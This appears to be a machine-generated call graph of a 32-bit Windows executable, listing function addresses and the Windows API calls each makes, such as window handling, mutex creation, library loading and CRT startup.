__ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 122216->122217 122219 1102e4c8 122217->122219 122218->122209 122219->121880 122221 1105d350 79 API calls 122220->122221 122222 110623c8 122221->122222 122826 110612d0 122222->122826 122236 11060590 274 API calls 122235->122236 122237 11027104 122236->122237 122238 1105d350 79 API calls 122237->122238 122239 11027119 122238->122239 122240 1102716f LoadIconA 122239->122240 122241 111416c0 std::_Mutex::_Mutex 90 API calls 122239->122241 122253 110271e8 122239->122253 122242 11027181 122240->122242 122243 1102718a GetSystemMetrics GetSystemMetrics LoadImageA 122240->122243 122245 11027152 LoadLibraryExA 122241->122245 122242->122243 122246 110271c3 122243->122246 122247 110271af LoadIconA 122243->122247 122244 1102729c 122248 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 122244->122248 122245->122240 122245->122247 122251 110271c7 GetSystemMetrics GetSystemMetrics LoadImageA 122246->122251 122246->122253 122247->122246 122250 110272a9 122248->122250 122250->121890 122251->122253 122252 11080cc0 86 API calls 122252->122253 122253->122244 122253->122252 122254 11141440 std::_Mutex::_Mutex 90 API calls 122253->122254 123162 11060930 268 API calls 4 library calls 122253->123162 122254->122253 122256 11142790 std::_Mutex::_Mutex 21 API calls 122255->122256 122792->121864 122793->121865 122947 11141240 122826->122947 122828 1106135c 122829 110cf110 268 API calls 122828->122829 122830 11061370 122829->122830 122831 11061384 std::ios_base::_Ios_base_dtor 122830->122831 122832 11061557 122830->122832 122956 11160b2d 122830->122956 122833 11160445 std::_Mutex::_Mutex 102 API calls 122831->122833 122837 110622c8 122831->122837 122834 11160b2d _fgets 81 API calls 122832->122834 122833->122837 122838 11061571 122834->122838 122835 110ce380 265 API calls 122933 11061451 std::ios_base::_Ios_base_dtor 122835->122933 122837->122835 122844 110615d7 _strpbrk 122838->122844 122845 11061578 122838->122845 122949 11141253 std::ios_base::_Ios_base_dtor 122947->122949 122948 11141160 267 API calls 122948->122949 122949->122948 122950 1116067b std::_Mutex::_Mutex 143 API calls 122949->122950 122951 11141275 GetLastError 122949->122951 122952 111412ba std::ios_base::_Ios_base_dtor 122949->122952 122950->122949 122951->122949 122953 11141280 Sleep 122951->122953 122952->122828 122954 1116067b std::_Mutex::_Mutex 143 API calls 122953->122954 122955 11141292 122954->122955 122955->122949 122955->122952 122958 11160b39 __tsopen_nolock 122956->122958 122957 11160b4c 123062 111659cf 66 API calls __getptd_noexit 122957->123062 122958->122957 122960 11160b7d 122958->122960 122963 11160b5c __tsopen_nolock 122960->122963 122964 11167679 __lock_file 67 API calls 122960->122964 123162->122253 124765 11139580 124766 11139589 124765->124766 124767 1113958e 124765->124767 124769 111365d0 124766->124769 124770 11136612 124769->124770 124771 11136607 GetCurrentThreadId 124769->124771 124772 11136620 124770->124772 125051 11028fa0 269 API calls 124770->125051 124771->124770 124903 11130e10 124772->124903 124778 11136711 124784 11136742 FindWindowA 124778->124784 124788 111367da 124778->124788 124779 11136c9a 124780 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 124779->124780 124782 11136cb2 124780->124782 124782->124767 124783 1113665c IsWindow IsWindowVisible 124785 11142790 std::_Mutex::_Mutex 21 API calls 124783->124785 124786 11136757 IsWindowVisible 124784->124786 124784->124788 124787 11136687 124785->124787 124786->124788 124789 1113675e 124786->124789 124791 1105d350 79 API calls 124787->124791 124792 1105d350 79 API calls 124788->124792 124797 111367ff 124788->124797 124789->124788 124796 11136170 378 API calls 124789->124796 124790 111369b0 124795 111369ca 124790->124795 124801 11136170 378 API calls 124790->124801 124794 111366a3 IsWindowVisible 124791->124794 124815 11136827 124792->124815 124793 1105d350 79 API calls 124799 1113699f 124793->124799 124794->124778 124800 111366b1 124794->124800 124798 111369e7 124795->124798 125137 1106aec0 298 API calls 124795->125137 124802 1113677f IsWindowVisible 124796->124802 124797->124790 124797->124793 125138 1112a060 12 API calls 2 library calls 124798->125138 124799->124790 124806 111369a4 124799->124806 124800->124778 124807 111366b9 124800->124807 124801->124795 124802->124788 124804 1113678e IsIconic 124802->124804 124804->124788 124808 1113679f GetForegroundWindow 124804->124808 125136 1102cbe0 294 API calls std::_Mutex::_Mutex 124806->125136 124811 11142790 std::_Mutex::_Mutex 21 API calls 124807->124811 125134 1112e440 147 API calls 124808->125134 124809 111369ec 124813 111369f4 124809->124813 124814 111369fd 124809->124814 124818 111366c3 GetForegroundWindow 124811->124818 125139 1112ed30 89 API calls 2 library calls 124813->125139 124822 11136a14 124814->124822 124823 11136a08 124814->124823 124815->124797 124816 11136874 124815->124816 124820 11080b80 IsDBCSLeadByte 124815->124820 124824 1113f5d0 std::_Mutex::_Mutex 8 API calls 124816->124824 124817 111369ab 124817->124790 124825 111366d2 EnableWindow 124818->124825 124826 111366fe 124818->124826 124819 111367ae 125135 1112e440 147 API calls 124819->125135 124820->124816 125141 1112e9d0 299 API calls std::_Mutex::_Mutex 124822->125141 124829 11136a19 124823->124829 125140 1112eaa0 299 API calls std::_Mutex::_Mutex 124823->125140 124830 11136886 124824->124830 125132 1112e440 147 API calls 124825->125132 124826->124778 124837 1113670a SetForegroundWindow 124826->124837 124828 111369fa 124828->124814 124833 11136a12 124829->124833 124834 11136b29 124829->124834 124839 11136893 GetLastError 124830->124839 124850 111368a1 124830->124850 124833->124829 124840 11136a31 124833->124840 124841 11136adb 124833->124841 124843 11135d30 295 API calls 124834->124843 124835 111366e9 125133 1112e440 147 API calls 124835->125133 124836 111367b5 124844 111367cb EnableWindow 124836->124844 124847 111367c4 SetForegroundWindow 124836->124847 124837->124778 124845 11142790 std::_Mutex::_Mutex 21 API calls 124839->124845 124840->124834 124852 1110c4b0 std::_Mutex::_Mutex 265 API calls 124840->124852 124841->124834 125149 1103e7c0 68 API calls 124841->125149 124860 11136b2e 124843->124860 124844->124788 124845->124850 124846 111366f0 EnableWindow 124846->124826 124847->124844 124848 11136b55 124862 1105d350 79 API calls 124848->124862 124902 11136c7a std::ios_base::_Ios_base_dtor 124848->124902 124850->124797 124851 111368f2 124850->124851 124854 11080b80 IsDBCSLeadByte 124850->124854 124856 1113f5d0 std::_Mutex::_Mutex 8 API calls 124851->124856 124855 11136a52 124852->124855 124853 11136aea 125150 1103e800 68 API calls 124853->125150 124854->124851 124858 11136a73 124855->124858 125142 11056a30 308 API calls std::_Mutex::_Mutex 124855->125142 124859 11136904 124856->124859 125143 1110c2f0 InterlockedIncrement 124858->125143 124859->124797 124864 1113690b GetLastError 124859->124864 124860->124848 125047 1113e5b0 124860->125047 124861 11136af5 125151 1103e820 68 API calls 124861->125151 124875 11136b85 124862->124875 124868 11142790 std::_Mutex::_Mutex 21 API calls 124864->124868 124868->124797 124869 11136b00 125152 1103e7e0 68 API calls 124869->125152 124871 11136a98 125144 1104c410 1004 API calls 124871->125144 124872 11136b0b 125153 1110c300 InterlockedDecrement 124872->125153 124876 11136bcd 124875->124876 124879 11136baa 124875->124879 124880 11136bd9 GetTickCount 124875->124880 124875->124902 124876->124880 124876->124902 124877 11136aa3 125145 1104d940 1004 API calls 124877->125145 124878 11136ad9 124878->124834 124883 11142790 std::_Mutex::_Mutex 21 API calls 124879->124883 124884 11136beb 124880->124884 124880->124902 124882 11136aae 125146 1104d9b0 1004 API calls 124882->125146 124886 11136bb5 GetTickCount 124883->124886 124887 1113f220 145 API calls 124884->124887 124886->124902 124889 11136bf7 124887->124889 124888 11136ab9 125147 1104c450 1004 API calls 124888->125147 124891 11143220 269 API calls 124889->124891 124893 11136c02 124891->124893 124892 11136ac4 124892->124834 125148 110e9c60 285 API calls 124892->125148 124894 1113f220 145 API calls 124893->124894 124895 11136c15 124894->124895 125154 11025850 LoadLibraryA 124895->125154 124898 11136c22 125155 11129970 GetProcAddress SetLastError 124898->125155 124900 11136c69 124901 11136c73 FreeLibrary 124900->124901 124900->124902 124901->124902 124902->124779 124904 11130e52 124903->124904 124905 11131174 124903->124905 124907 1105d350 79 API calls 124904->124907 124906 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 124905->124906 124908 1113118c 124906->124908 124909 11130e72 124907->124909 124948 111308f0 124908->124948 124909->124905 124910 11130e7a GetLocalTime 124909->124910 124911 11130eb1 LoadLibraryA 124910->124911 124912 11130e90 124910->124912 125156 11009890 LoadLibraryA 124911->125156 124913 11142790 std::_Mutex::_Mutex 21 API calls 124912->124913 124915 11130ea5 124913->124915 124915->124911 124916 11130f05 125157 11015e40 LoadLibraryA 124916->125157 124918 11130f10 GetCurrentProcess 124919 11130f35 GetProcAddress 124918->124919 124920 11130f4d 124918->124920 124919->124920 124921 11130f56 SetLastError 124919->124921 124922 11130f82 124920->124922 124923 11130f68 GetProcAddress 124920->124923 124921->124920 124925 11130f90 GetProcAddress 124922->124925 124926 11130faa 124922->124926 124923->124922 124924 11130fb7 SetLastError 124923->124924 124924->124925 124925->124926 124927 11130fc4 SetLastError 124925->124927 124928 11130fcf GetProcAddress 124926->124928 124927->124928 124929 11130fef SetLastError 124928->124929 124930 11130fe1 124928->124930 124929->124930 124931 11142790 std::_Mutex::_Mutex 21 API calls 124930->124931 124933 1113106d 124930->124933 124931->124933 124932 1113114a 124934 1113115a FreeLibrary 124932->124934 124935 1113115d 124932->124935 124933->124932 124939 1105d350 79 API calls 124933->124939 124934->124935 124936 11131167 FreeLibrary 124935->124936 124937 1113116a 124935->124937 124936->124937 124937->124905 124938 11131171 FreeLibrary 124937->124938 124938->124905 124940 111310be 124939->124940 124941 1105d350 79 API calls 124940->124941 124942 111310e6 124941->124942 124943 1105d350 79 API calls 124942->124943 124944 1113110d 124943->124944 124945 1105d350 79 API calls 124944->124945 124946 11131134 124945->124946 124946->124932 125158 11027390 265 API calls 2 library calls 124946->125158 124950 1113091d 124948->124950 124949 11130dd9 124949->124778 124949->124779 125052 11136170 124949->125052 124950->124949 124951 110cf110 268 API calls 124950->124951 124952 1113097e 124951->124952 124953 110cf110 268 API calls 124952->124953 124954 11130989 124953->124954 124955 111309b7 124954->124955 124956 111309ce 124954->124956 125159 110290c0 265 API calls 2 library calls 124955->125159 124958 11142790 std::_Mutex::_Mutex 21 API calls 124956->124958 124960 111309dc 124958->124960 125160 110ceea0 265 API calls 124960->125160 125048 1113e5cf 125047->125048 125049 1113e5ba 125047->125049 125048->124848 125161 1113dc30 125049->125161 125051->124772 125053 111365af 125052->125053 125056 1113618d 125052->125056 125054 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125053->125054 125055 111365be 125054->125055 125055->124783 125056->125053 125057 11141440 std::_Mutex::_Mutex 90 API calls 125056->125057 125058 111361cc 125057->125058 125058->125053 125059 1105d350 79 API calls 125058->125059 125060 111361fb 125059->125060 125291 11129af0 125060->125291 125062 11136340 PostMessageA 125064 11136355 125062->125064 125063 1105d350 79 API calls 125066 1113633c 125063->125066 125065 11136365 125064->125065 125300 1110c300 InterlockedDecrement 125064->125300 125068 1113636b 125065->125068 125069 1113638d 125065->125069 125066->125062 125066->125064 125071 111363c3 std::ios_base::_Ios_base_dtor 125068->125071 125072 111363de 125068->125072 125301 1112d640 301 API calls std::_Mutex::_Mutex 125069->125301 125079 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125071->125079 125074 1113f220 145 API calls 125072->125074 125073 11136395 125302 11143200 267 API calls 125073->125302 125077 111363e3 125074->125077 125080 11143220 269 API calls 125077->125080 125078 1113639f 125303 11129cf0 SetDlgItemTextA 125078->125303 125082 111363da 125079->125082 125083 111363ea SetWindowTextA 125080->125083 125082->124783 125085 11136406 125083->125085 125091 1113640d std::ios_base::_Ios_base_dtor 125083->125091 125084 111363b0 std::ios_base::_Ios_base_dtor 125084->125068 125304 11132790 299 API calls 5 library calls 125085->125304 125086 11141e80 271 API calls 125088 111362eb 125086->125088 125088->125062 125088->125063 125089 11136464 125092 11136478 125089->125092 125093 1113653c 125089->125093 125090 11136437 125090->125089 125096 1113644c 125090->125096 125091->125089 125091->125090 125305 11132790 299 API calls 5 library calls 125091->125305 125097 1113649c 125092->125097 125307 11132790 299 API calls 5 library calls 125092->125307 125095 1113655d 125093->125095 125100 1113654b 125093->125100 125101 11136544 125093->125101 125313 110f6140 86 API calls 125095->125313 125306 1112e440 147 API calls 125096->125306 125309 110f6140 86 API calls 125097->125309 125312 1112e440 147 API calls 125100->125312 125311 11132790 299 API calls 5 library calls 125101->125311 125103 11136568 125103->125053 125109 1113656c IsWindowVisible 125103->125109 125105 111364a7 125105->125053 125111 111364af IsWindowVisible 125105->125111 125107 1113645c 125107->125089 125109->125053 125113 1113657e IsWindowVisible 125109->125113 125110 11136486 125110->125097 125114 11136492 125110->125114 125111->125053 125115 111364c6 125111->125115 125112 1113655a 125112->125095 125113->125053 125116 1113658b EnableWindow 125113->125116 125308 1112e440 147 API calls 125114->125308 125118 11141440 std::_Mutex::_Mutex 90 API calls 125115->125118 125314 1112e440 147 API calls 125116->125314 125121 111364d1 125118->125121 125120 11136499 125120->125097 125121->125053 125123 111364dc GetForegroundWindow IsWindowVisible 125121->125123 125122 111365a2 EnableWindow 125122->125053 125124 11136501 125123->125124 125125 111364f6 EnableWindow 125123->125125 125310 1112e440 147 API calls 125124->125310 125125->125124 125127 11136508 125128 1113651e EnableWindow 125127->125128 125129 11136517 SetForegroundWindow 125127->125129 125130 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125128->125130 125129->125128 125131 11136538 125130->125131 125131->124783 125132->124835 125133->124846 125134->124819 125135->124836 125136->124817 125137->124798 125138->124809 125139->124828 125140->124833 125141->124829 125142->124858 125143->124871 125144->124877 125145->124882 125146->124888 125147->124892 125148->124878 125149->124853 125150->124861 125151->124869 125152->124872 125153->124878 125154->124898 125155->124900 125156->124916 125157->124918 125158->124932 125162 1113dc6f 125161->125162 125213 1113dc68 std::ios_base::_Ios_base_dtor 125161->125213 125163 1110c4b0 std::_Mutex::_Mutex 265 API calls 125162->125163 125165 1113dc76 125163->125165 125164 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125167 1113e5aa 125164->125167 125166 1113dca6 125165->125166 125168 110605c0 301 API calls 125165->125168 125169 11060d40 275 API calls 125166->125169 125167->125048 125168->125166 125170 1113dce2 125169->125170 125171 1113dce9 RegCloseKey 125170->125171 125172 1113dcf0 std::_Mutex::_Mutex 125170->125172 125171->125172 125173 11141160 267 API calls 125172->125173 125174 1113dd0c 125173->125174 125175 1113f5d0 std::_Mutex::_Mutex 8 API calls 125174->125175 125176 1113dd20 125175->125176 125177 1113dd37 125176->125177 125178 110623a0 330 API calls 125176->125178 125179 1110c4b0 std::_Mutex::_Mutex 265 API calls 125177->125179 125178->125177 125180 1113dd3e 125179->125180 125181 1113dd5a 125180->125181 125182 11060230 293 API calls 125180->125182 125183 1110c4b0 std::_Mutex::_Mutex 265 API calls 125181->125183 125182->125181 125184 1113dd73 125183->125184 125185 1113dd8f 125184->125185 125186 11060230 293 API calls 125184->125186 125187 1110c4b0 std::_Mutex::_Mutex 265 API calls 125185->125187 125186->125185 125188 1113dda8 125187->125188 125189 1113ddc4 125188->125189 125190 11060230 293 API calls 125188->125190 125191 1105fdb0 268 API calls 125189->125191 125190->125189 125192 1113dded 125191->125192 125193 1105fdb0 268 API calls 125192->125193 125231 1113de07 125193->125231 125194 1113e135 125196 110cf110 268 API calls 125194->125196 125198 1113e519 125194->125198 125195 1105fe40 274 API calls 125195->125231 125197 1113e153 125196->125197 125203 1105d350 79 API calls 125197->125203 125205 1105fc90 69 API calls 125198->125205 125199 1113e125 125202 11142790 std::_Mutex::_Mutex 21 API calls 125199->125202 125200 11080cc0 86 API calls 125200->125231 125201 11142790 21 API calls std::_Mutex::_Mutex 125201->125231 125202->125194 125204 1113e190 125203->125204 125206 1113e2dd 125204->125206 125208 1105fdb0 268 API calls 125204->125208 125207 1113e572 125205->125207 125210 11060590 274 API calls 125206->125210 125209 1105fc90 69 API calls 125207->125209 125212 1113e1ae 125208->125212 125209->125213 125214 1113e2f9 125210->125214 125211 1112ec20 86 API calls 125211->125231 125215 1105fe40 274 API calls 125212->125215 125213->125164 125286 11067020 298 API calls std::_Mutex::_Mutex 125214->125286 125223 1113e1bd 125215->125223 125217 1113e1f2 125218 1105fdb0 268 API calls 125217->125218 125221 1113e208 125218->125221 125219 1113e323 125222 1113e353 EnterCriticalSection 125219->125222 125233 1113e327 125219->125233 125220 11142790 std::_Mutex::_Mutex 21 API calls 125220->125223 125224 1105fe40 274 API calls 125221->125224 125225 1105fa70 271 API calls 125222->125225 125223->125217 125223->125220 125226 1105fe40 274 API calls 125223->125226 125242 1113e218 125224->125242 125229 1113e370 125225->125229 125226->125223 125227 11080d70 86 API calls std::_Mutex::_Mutex 125227->125231 125230 11060590 274 API calls 125229->125230 125234 1113e386 125230->125234 125231->125194 125231->125195 125231->125199 125231->125200 125231->125201 125231->125211 125231->125227 125232 1113e251 125233->125222 125287 1104ff40 354 API calls 4 library calls 125233->125287 125288 11067020 298 API calls std::_Mutex::_Mutex 125233->125288 125237 11142790 std::_Mutex::_Mutex 21 API calls 125237->125242 125242->125232 125242->125237 125247 1105fe40 274 API calls 125242->125247 125247->125242 125286->125219 125287->125233 125288->125233 125292 11129b0c 125291->125292 125293 11129b47 125292->125293 125294 11129b34 125292->125294 125315 1106aec0 298 API calls 125293->125315 125296 11143220 269 API calls 125294->125296 125297 11129b3f 125296->125297 125298 1113e630 std::_Mutex::_Mutex 265 API calls 125297->125298 125299 11129b93 125297->125299 125298->125299 125299->125086 125299->125088 125300->125065 125301->125073 125302->125078 125303->125084 125304->125091 125305->125090 125306->125107 125307->125110 125308->125120 125309->125105 125310->125127 125311->125100 125312->125112 125313->125103 125314->125122 125315->125297 125316 1103fff0 125317 11040022 125316->125317 125318 11040028 125317->125318 125323 11040044 125317->125323 125319 110f86a0 15 API calls 125318->125319 125321 1104003a CloseHandle 125319->125321 125320 11040158 125322 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125320->125322 125321->125323 125325 11040165 125322->125325 125323->125320 125327 1104007d 125323->125327 125348 11086fe0 297 API calls 5 library calls 125323->125348 125324 110400d8 125338 110f86a0 GetTokenInformation 125324->125338 125327->125320 125327->125324 125329 110400ea 125330 110400f2 CloseHandle 125329->125330 125333 110400f9 125329->125333 125330->125333 125331 1104013b 125334 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125331->125334 125332 11040121 125335 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125332->125335 125333->125331 125333->125332 125336 11040154 125334->125336 125337 11040137 125335->125337 125339 110f86e8 125338->125339 125340 110f86d7 125338->125340 125349 110efbd0 9 API calls 125339->125349 125341 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125340->125341 125343 110f86e4 125341->125343 125343->125329 125344 110f870c 125344->125340 125345 110f8714 125344->125345 125346 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125345->125346 125347 110f873a 125346->125347 125347->125329 125348->125327 125349->125344 125350 111405a0 125351 111405b1 125350->125351 125364 1113ffc0 125351->125364 125355 11140635 125358 11140652 125355->125358 125360 11140634 125355->125360 125356 111405fb 125357 11140602 ResetEvent 125356->125357 125372 11140180 265 API calls 2 library calls 125357->125372 125360->125355 125373 11140180 265 API calls 2 library calls 125360->125373 125361 11140616 SetEvent WaitForMultipleObjects 125361->125357 125361->125360 125363 1114064f 125363->125358 125365 1113ffef 125364->125365 125366 1113ffcc GetCurrentProcess 125364->125366 125368 1110c4b0 std::_Mutex::_Mutex 263 API calls 125365->125368 125370 11140019 WaitForMultipleObjects 125365->125370 125366->125365 125367 1113ffdd GetModuleFileNameA 125366->125367 125367->125365 125369 1114000b 125368->125369 125369->125370 125374 1113f910 GetModuleFileNameA 125369->125374 125370->125355 125370->125356 125372->125361 125373->125363 125375 1113f993 125374->125375 125376 1113f953 125374->125376 125379 1113f9b9 GetModuleHandleA GetProcAddress 125375->125379 125380 1113f99f LoadLibraryA 125375->125380 125377 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 125376->125377 125378 1113f961 125377->125378 125378->125375 125381 1113f968 LoadLibraryA 125378->125381 125383 1113f9e7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 125379->125383 125384 1113f9d9 125379->125384 125380->125379 125382 1113f9ae LoadLibraryA 125380->125382 125381->125375 125382->125379 125385 1113fa13 10 API calls 125383->125385 125384->125385 125386 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125385->125386 125387 1113fa90 125386->125387 125387->125370 125388 6cd463a0 125393 6cd46350 125388->125393 125391 6cd463b1 Sleep 125392 6cd463a9 WSACancelBlockingCall 125394 6cd4638d 125393->125394 125395 6cd628e1 _strlwr_s_l_stat 5 API calls 125394->125395 125396 6cd46397 125395->125396 125396->125391 125396->125392 125397 1102fe74 125398 1113ee00 267 API calls 125397->125398 125399 1102fe82 125398->125399 125400 1113ef50 86 API calls 125399->125400 125401 1102fec5 125400->125401 125402 1102feda 125401->125402 125404 11080cc0 86 API calls 125401->125404 125403 110eae40 8 API calls 125402->125403 125405 1102ff05 125403->125405 125404->125402 125407 1102ff4c 125405->125407 125450 110eaef0 81 API calls 2 library calls 125405->125450 125409 1113ef50 86 API calls 125407->125409 125408 1102ff1a 125451 110eaef0 81 API calls 2 library calls 125408->125451 125411 1102ff61 125409->125411 125413 1110c4b0 std::_Mutex::_Mutex 265 API calls 125411->125413 125412 1102ff30 125412->125407 125414 11142710 19 API calls 125412->125414 125415 1102ff70 125413->125415 125414->125407 125416 1102ff91 125415->125416 125417 11087960 268 API calls 125415->125417 125418 11089560 267 API calls 125416->125418 125417->125416 125419 1102ffa4 OpenMutexA 125418->125419 125420 1102ffc3 CreateMutexA 125419->125420 125421 110300ac CloseHandle 125419->125421 125423 1102ffe5 125420->125423 125443 11089660 125421->125443 125424 1110c4b0 std::_Mutex::_Mutex 265 API calls 125423->125424 125425 1102fffa 125424->125425 125427 1103001d 125425->125427 125428 11060230 293 API calls 125425->125428 125426 110300c2 125429 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125426->125429 125452 11015e40 LoadLibraryA 125427->125452 125428->125427 125431 11030a3f 125429->125431 125432 1103002f 125433 11030043 GetProcAddress 125432->125433 125434 11030059 125432->125434 125433->125434 125435 1103005d SetLastError 125433->125435 125436 11027de0 47 API calls 125434->125436 125435->125434 125437 1103006a 125436->125437 125453 110092c0 428 API calls std::_Mutex::_Mutex 125437->125453 125439 11030079 125440 11030082 WaitForSingleObject 125439->125440 125440->125440 125441 11030094 CloseHandle 125440->125441 125441->125421 125442 110300a5 FreeLibrary 125441->125442 125442->125421 125444 11089707 125443->125444 125448 1108969a std::ios_base::_Ios_base_dtor 125443->125448 125445 1108970e DeleteCriticalSection 125444->125445 125454 111579b0 125445->125454 125447 110896ae CloseHandle 125447->125448 125448->125444 125448->125447 125449 11089734 std::ios_base::_Ios_base_dtor 125449->125426 125450->125408 125451->125412 125452->125432 125453->125439 125457 111579c4 125454->125457 125455 111579c8 125455->125449 125457->125455 125458 111576b0 67 API calls 2 library calls 125457->125458 125458->125457 125459 11088b10 125460 1110c770 ___DllMainCRTStartup 4 API calls 125459->125460 125461 11088b23 125460->125461 125462 11088b2d 125461->125462 125471 11088250 268 API calls std::_Mutex::_Mutex 125461->125471 125465 11088b54 125462->125465 125472 11088250 268 API calls std::_Mutex::_Mutex 125462->125472 125467 11088b63 125465->125467 125468 11088ae0 125465->125468 125473 11088770 125468->125473 125471->125462 125472->125465 125514 11087a70 6 API calls ___DllMainCRTStartup 125473->125514 125475 110887a9 GetParent 125476 110887bc 125475->125476 125477 110887cd 125475->125477 125478 110887c0 GetParent 125476->125478 125479 11141160 267 API calls 125477->125479 125478->125477 125478->125478 125480 110887d9 125479->125480 125481 1116067b std::_Mutex::_Mutex 143 API calls 125480->125481 125482 110887e6 std::ios_base::_Ios_base_dtor 125481->125482 125483 11141160 267 API calls 125482->125483 125484 110887ff 125483->125484 125515 110139f0 22 API calls 2 library calls 125484->125515 125486 1108881a 125486->125486 125487 1113f5d0 std::_Mutex::_Mutex 8 API calls 125486->125487 125490 1108885a std::ios_base::_Ios_base_dtor 125487->125490 125488 11088875 125489 11160445 std::_Mutex::_Mutex 102 API calls 125488->125489 125492 11088893 std::_Mutex::_Mutex 125488->125492 125489->125492 125490->125488 125491 1113e630 std::_Mutex::_Mutex 265 API calls 125490->125491 125491->125488 125494 1102a220 std::_Mutex::_Mutex 145 API calls 125492->125494 125505 11088944 std::ios_base::_Ios_base_dtor 125492->125505 125493 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125495 11088a32 125493->125495 125496 110888e3 125494->125496 125495->125467 125497 1113e630 std::_Mutex::_Mutex 265 API calls 125496->125497 125498 110888eb 125497->125498 125499 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 125498->125499 125500 11088902 125499->125500 125501 11080cc0 86 API calls 125500->125501 125500->125505 125502 1108891a 125501->125502 125503 1108895e 125502->125503 125504 11088921 125502->125504 125507 11080cc0 86 API calls 125503->125507 125516 110b6660 125504->125516 125505->125493 125509 11088969 125507->125509 125509->125505 125511 110b6660 68 API calls 125509->125511 125510 110b6660 68 API calls 125510->125505 125512 11088976 125511->125512 125512->125505 125513 110b6660 68 API calls 125512->125513 125513->125505 125514->125475 125515->125486 125519 110b6640 125516->125519 125522 111639c3 125519->125522 125525 11163944 125522->125525 125526 11163951 125525->125526 125527 1116396b 125525->125527 125543 111659e2 66 API calls __getptd_noexit 125526->125543 125527->125526 125529 11163974 GetFileAttributesA 125527->125529 125531 11163982 GetLastError 125529->125531 125534 11163998 125529->125534 125530 11163956 125544 111659cf 66 API calls __getptd_noexit 125530->125544 125546 111659f5 66 API calls 2 library calls 125531->125546 125536 11088927 125534->125536 125548 111659e2 66 API calls __getptd_noexit 125534->125548 125535 1116395d 125545 1116a5e4 11 API calls __tsopen_nolock 125535->125545 125536->125505 125536->125510 125537 1116398e 125547 111659cf 66 API calls __getptd_noexit 125537->125547 125541 111639ab 125549 111659cf 66 API calls __getptd_noexit 125541->125549 125543->125530 125544->125535 125545->125536 125546->125537 125547->125536 125548->125541 125549->125537 125550 11165ded 125551 11165dfd 125550->125551 125552 11165df8 125550->125552 125556 11165cf7 125551->125556 125568 11173758 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 125552->125568 125555 11165e0b 125558 11165d03 __tsopen_nolock 125556->125558 125557 11165d50 125565 11165da0 __tsopen_nolock 125557->125565 125619 11025ad0 125557->125619 125558->125557 125558->125565 125569 11165b93 125558->125569 125561 11165d63 125562 11165d80 125561->125562 125564 11025ad0 ___DllMainCRTStartup 7 API calls 125561->125564 125563 11165b93 __CRT_INIT@12 149 API calls 125562->125563 125562->125565 125563->125565 125566 11165d77 125564->125566 125565->125555 125567 11165b93 __CRT_INIT@12 149 API calls 125566->125567 125567->125562 125568->125551 125570 11165b9f __tsopen_nolock 125569->125570 125571 11165ba7 125570->125571 125572 11165c21 125570->125572 125628 11169bb0 HeapCreate 125571->125628 125574 11165c27 125572->125574 125575 11165c82 125572->125575 125580 11165c45 125574->125580 125586 11165bb0 __tsopen_nolock 125574->125586 125716 11169e7b 66 API calls _doexit 125574->125716 125576 11165c87 125575->125576 125577 11165ce0 125575->125577 125579 11167cda ___set_flsgetvalue 3 API calls 125576->125579 125577->125586 125722 11167fde 79 API calls __freefls@4 125577->125722 125578 11165bac 125578->125586 125629 1116804c GetModuleHandleW 125578->125629 125582 11165c8c 125579->125582 125585 11165c59 125580->125585 125717 1116dabe 67 API calls _free 125580->125717 125587 1116649e __calloc_crt 66 API calls 125582->125587 125720 11165c6c 70 API calls __mtterm 125585->125720 125586->125557 125591 11165c98 125587->125591 125588 11165bbc __RTC_Initialize 125592 11165bc0 125588->125592 125598 11165bcc GetCommandLineA 125588->125598 125591->125586 125594 11165ca4 DecodePointer 125591->125594 125713 11169bce HeapDestroy 125592->125713 125593 11165c4f 125718 11167d2b 70 API calls _free 125593->125718 125599 11165cb9 125594->125599 125597 11165c54 125719 11169bce HeapDestroy 125597->125719 125654 11173675 GetEnvironmentStringsW 125598->125654 125602 11165cd4 125599->125602 125603 11165cbd 125599->125603 125607 1115f2c5 _free 66 API calls 125602->125607 125721 11167d68 66 API calls 4 library calls 125603->125721 125607->125586 125609 11165cc4 GetCurrentThreadId 125609->125586 125610 11165bea 125714 11167d2b 70 API calls _free 125610->125714 125614 11165c0a 125614->125586 125715 1116dabe 67 API calls _free 125614->125715 125620 1110c880 125619->125620 125621 1110c8a1 125620->125621 125623 1110c8b4 ___DllMainCRTStartup 125620->125623 125624 1110c88c 125620->125624 125739 1110c7d0 125621->125739 125623->125561 125624->125623 125625 1110c7d0 ___DllMainCRTStartup 7 API calls 125624->125625 125627 1110c895 125625->125627 125626 1110c8a8 125626->125561 125627->125561 125628->125578 125630 11168060 125629->125630 125631 11168069 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 125629->125631 125723 11167d2b 70 API calls _free 125630->125723 125633 111680b3 TlsAlloc 125631->125633 125636 111681c2 125633->125636 125637 11168101 TlsSetValue 125633->125637 125634 11168065 125634->125588 125636->125588 125637->125636 125638 11168112 125637->125638 125724 11169c37 EncodePointer 